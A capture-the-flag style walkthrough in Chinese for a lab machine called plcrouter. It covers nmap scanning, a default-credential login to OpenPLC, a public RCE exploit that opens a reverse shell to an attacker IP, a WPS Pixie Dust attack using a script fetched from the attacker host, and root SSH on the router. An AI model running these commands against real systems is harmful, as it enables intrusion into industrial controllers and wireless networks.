基本信息

端口扫描

22,8080:

1
2
3
4
5
6
7
8
9
10
11
12
13
14
15
16
17
18
19
20
21
22
23
24
25
26
27
28
29
30
31
32
33
34
35
36
37
38
39
40
41
42
43
44
45
46
47
48
49
50
51
52
53
54
55
56
57
58
59
60
61
62
63
64
65
66
67
68
69
70
71
72
73
74
75
76
77
78
79
80
81
82
83
84
85
86
87
88
89
90
91
92
93
94
95
96
97
98
$ nmap -sC -sV 10.10.11.7
Starting Nmap 7.94 ( https://nmap.org ) at 2024-03-20 14:22 CST
Nmap scan report for 10.10.11.7
Host is up (0.13s latency).
Not shown: 998 closed tcp ports (conn-refused)
PORT     STATE SERVICE    VERSION
22/tcp   open  ssh        OpenSSH 8.2p1 Ubuntu 4ubuntu0.11 (Ubuntu Linux; protocol 2.0)
| ssh-hostkey:
|   3072 48:ad:d5:b8:3a:9f:bc:be:f7:e8:20:1e:f6:bf:de:ae (RSA)
|   256 b7:89:6c:0b:20:ed:49:b2:c1:86:7c:29:92:74:1c:1f (ECDSA)
|_  256 18:cd:9d:08:a6:21:a8:b8:b6:f7:9f:8d:40:51:54:fb (ED25519)
8080/tcp open  http-proxy Werkzeug/1.0.1 Python/2.7.18
| fingerprint-strings:
|   FourOhFourRequest:
|     HTTP/1.0 404 NOT FOUND
|     content-type: text/html; charset=utf-8
|     content-length: 232
|     vary: Cookie
|     set-cookie: session=eyJfcGVybWFuZW50Ijp0cnVlfQ.ZfqAOw.xhR8Ct1rU_ysxAubmdd7vRWUafI; Expires=Wed, 20-Mar-2024 06:25:43 GMT; HttpOnly; Path=/
|     server: Werkzeug/1.0.1 Python/2.7.18
|     date: Wed, 20 Mar 2024 06:20:43 GMT
|     <!DOCTYPE HTML PUBLIC "-//W3C//DTD HTML 3.2 Final//EN">
|     <title>404 Not Found</title>
|     <h1>Not Found</h1>
|     <p>The requested URL was not found on the server. If you entered the URL manually please check your spelling and try again.</p>
|   GetRequest:
|     HTTP/1.0 302 FOUND
|     content-type: text/html; charset=utf-8
|     content-length: 219
|     location: http://0.0.0.0:8080/login
|     vary: Cookie
|     set-cookie: session=eyJfZnJlc2giOmZhbHNlLCJfcGVybWFuZW50Ijp0cnVlfQ.ZfqAOw.TJqwQfRBdoHKUpteR1V8fskjJCM; Expires=Wed, 20-Mar-2024 06:25:43 GMT; HttpOnly; Path=/
|     server: Werkzeug/1.0.1 Python/2.7.18
|     date: Wed, 20 Mar 2024 06:20:43 GMT
|     <!DOCTYPE HTML PUBLIC "-//W3C//DTD HTML 3.2 Final//EN">
|     <title>Redirecting...</title>
|     <h1>Redirecting...</h1>
|     <p>You should be redirected automatically to target URL: <a href="/login">/login</a>. If not click the link.
|   HTTPOptions:
|     HTTP/1.0 200 OK
|     content-type: text/html; charset=utf-8
|     allow: HEAD, OPTIONS, GET
|     vary: Cookie
|     set-cookie: session=eyJfcGVybWFuZW50Ijp0cnVlfQ.ZfqAOw.xhR8Ct1rU_ysxAubmdd7vRWUafI; Expires=Wed, 20-Mar-2024 06:25:43 GMT; HttpOnly; Path=/
|     content-length: 0
|     server: Werkzeug/1.0.1 Python/2.7.18
|     date: Wed, 20 Mar 2024 06:20:43 GMT
|   RTSPRequest:
|     HTTP/1.1 400 Bad request
|     content-length: 90
|     cache-control: no-cache
|     content-type: text/html
|     connection: close
|     <html><body><h1>400 Bad request</h1>
|     Your browser sent an invalid request.
|_    </body></html>
|_http-server-header: Werkzeug/1.0.1 Python/2.7.18
| http-title: Site doesn't have a title (text/html; charset=utf-8).
|_Requested resource was http://10.10.11.7:8080/login
1 service unrecognized despite returning data. If you know the service/version, please submit the following fingerprint at https://nmap.org/cgi-bin/submit.cgi?new-service :
SF-Port8080-TCP:V=7.94%I=7%D=3/20%Time=65FA80E2%P=x86_64-apple-darwin22.4.
SF:0%r(GetRequest,24C,"HTTP/1\.0\x20302\x20FOUND\r\ncontent-type:\x20text/
SF:html;\x20charset=utf-8\r\ncontent-length:\x20219\r\nlocation:\x20http:/
SF:/0\.0\.0\.0:8080/login\r\nvary:\x20Cookie\r\nset-cookie:\x20session=eyJ
SF:fZnJlc2giOmZhbHNlLCJfcGVybWFuZW50Ijp0cnVlfQ\.ZfqAOw\.TJqwQfRBdoHKUpteR1
SF:V8fskjJCM;\x20Expires=Wed,\x2020-Mar-2024\x2006:25:43\x20GMT;\x20HttpOn
SF:ly;\x20Path=/\r\nserver:\x20Werkzeug/1\.0\.1\x20Python/2\.7\.18\r\ndate
SF::\x20Wed,\x2020\x20Mar\x202024\x2006:20:43\x20GMT\r\n\r\n<!DOCTYPE\x20H
SF:TML\x20PUBLIC\x20\"-//W3C//DTD\x20HTML\x203\.2\x20Final//EN\">\n<title>
SF:Redirecting\.\.\.</title>\n<h1>Redirecting\.\.\.</h1>\n<p>You\x20should
SF:\x20be\x20redirected\x20automatically\x20to\x20target\x20URL:\x20<a\x20
SF:href=\"/login\">/login</a>\.\x20\x20If\x20not\x20click\x20the\x20link\.
SF:")%r(HTTPOptions,14E,"HTTP/1\.0\x20200\x20OK\r\ncontent-type:\x20text/h
SF:tml;\x20charset=utf-8\r\nallow:\x20HEAD,\x20OPTIONS,\x20GET\r\nvary:\x2
SF:0Cookie\r\nset-cookie:\x20session=eyJfcGVybWFuZW50Ijp0cnVlfQ\.ZfqAOw\.x
SF:hR8Ct1rU_ysxAubmdd7vRWUafI;\x20Expires=Wed,\x2020-Mar-2024\x2006:25:43\
SF:x20GMT;\x20HttpOnly;\x20Path=/\r\ncontent-length:\x200\r\nserver:\x20We
SF:rkzeug/1\.0\.1\x20Python/2\.7\.18\r\ndate:\x20Wed,\x2020\x20Mar\x202024
SF:\x2006:20:43\x20GMT\r\n\r\n")%r(RTSPRequest,CF,"HTTP/1\.1\x20400\x20Bad
SF:\x20request\r\ncontent-length:\x2090\r\ncache-control:\x20no-cache\r\nc
SF:ontent-type:\x20text/html\r\nconnection:\x20close\r\n\r\n<html><body><h
SF:1>400\x20Bad\x20request</h1>\nYour\x20browser\x20sent\x20an\x20invalid\
SF:x20request\.\n</body></html>\n")%r(FourOhFourRequest,224,"HTTP/1\.0\x20
SF:404\x20NOT\x20FOUND\r\ncontent-type:\x20text/html;\x20charset=utf-8\r\n
SF:content-length:\x20232\r\nvary:\x20Cookie\r\nset-cookie:\x20session=eyJ
SF:fcGVybWFuZW50Ijp0cnVlfQ\.ZfqAOw\.xhR8Ct1rU_ysxAubmdd7vRWUafI;\x20Expire
SF:s=Wed,\x2020-Mar-2024\x2006:25:43\x20GMT;\x20HttpOnly;\x20Path=/\r\nser
SF:ver:\x20Werkzeug/1\.0\.1\x20Python/2\.7\.18\r\ndate:\x20Wed,\x2020\x20M
SF:ar\x202024\x2006:20:43\x20GMT\r\n\r\n<!DOCTYPE\x20HTML\x20PUBLIC\x20\"-
SF://W3C//DTD\x20HTML\x203\.2\x20Final//EN\">\n<title>404\x20Not\x20Found<
SF:/title>\n<h1>Not\x20Found</h1>\n<p>The\x20requested\x20URL\x20was\x20no
SF:t\x20found\x20on\x20the\x20server\.\x20If\x20you\x20entered\x20the\x20U
SF:RL\x20manually\x20please\x20check\x20your\x20spelling\x20and\x20try\x20
SF:again\.</p>\n");
Service Info: OS: Linux; CPE: cpe:/o:linux:linux_kernel

Service detection performed. Please report any incorrect results at https://nmap.org/submit/ .
Nmap done: 1 IP address (1 host up) scanned in 69.79 seconds

8080

Openplc:

OpenPLC

默认账号密码登录:

1
openplc:openplc

openplc rce

根据页面上一些信息基本都是2018年,比较老的版本,搜索可以找到:

代码需要做简单修改,根据系统里已有的programs修改代码里st名称:

1
681871.st -> blank_program.st

然后运行exp,打到容器root:

1
python3 49803.py -u http://10.10.11.7:8080/ -l openplc -p openplc -i 10.10.16.5 -r 4444

user flag

容器内root目录是user.txt:

信息

查看网卡可以发现一个wlan0,另外机器名本身也是和无线相关的:

plcrouter

所以后面就是看无线相关信息,扫描可以发现一个接入点:

1
2
3
iwlist wlan0 scan

ESSID:"plcrouter"

WPS Pixie Dust Attack

后面就是基础的WPS Pixie Dust Attack获取PSK:

1
2
3
4
5
6
7
curl http://10.10.16.5:7777/oneshot.py -o oneshot.py

python3 oneshot.py -i wlan0 --iface-down -K

[+] WPS PIN: '12345670'
[+] WPA PSK: 'NoWWEDoKnowWhaTisReal123!'
[+] AP SSID: 'plcrouter'

wifi

现在得到了密码就可以尝试连接wifi:

1
2
3
wpa_passphrase plcrouter NoWWEDoKnowWhaTisReal123! | sudo tee /etc/wpa_supplicant.conf

sudo wpa_supplicant -B -c /etc/wpa_supplicant.conf -i wlan0

但连接后并没有自动分配ip,手动dhcp获取地址大概率崩溃:

1
sudo dhclient wlan0

wlan service

所以需要修改service配置然后重启服务来获取地址:

1
2
3
4
5
6
7
8
9
10
11
echo '
[Match]
Name=wlan0
[Network]
DHCP=ipv4
' > /etc/systemd/network/25-wlan.network

systemctl enable wpa_supplicant@wlan0.service

systemctl restart systemd-networkd.service
systemctl restart wpa_supplicant@wlan0.service

之后再查看,现在分配到了ip:

root flag

然后就可以探测wifi网段或者直接猜测192.168.1.1,直接登录即可:

1
ssh root@192.168.1.1

参考资料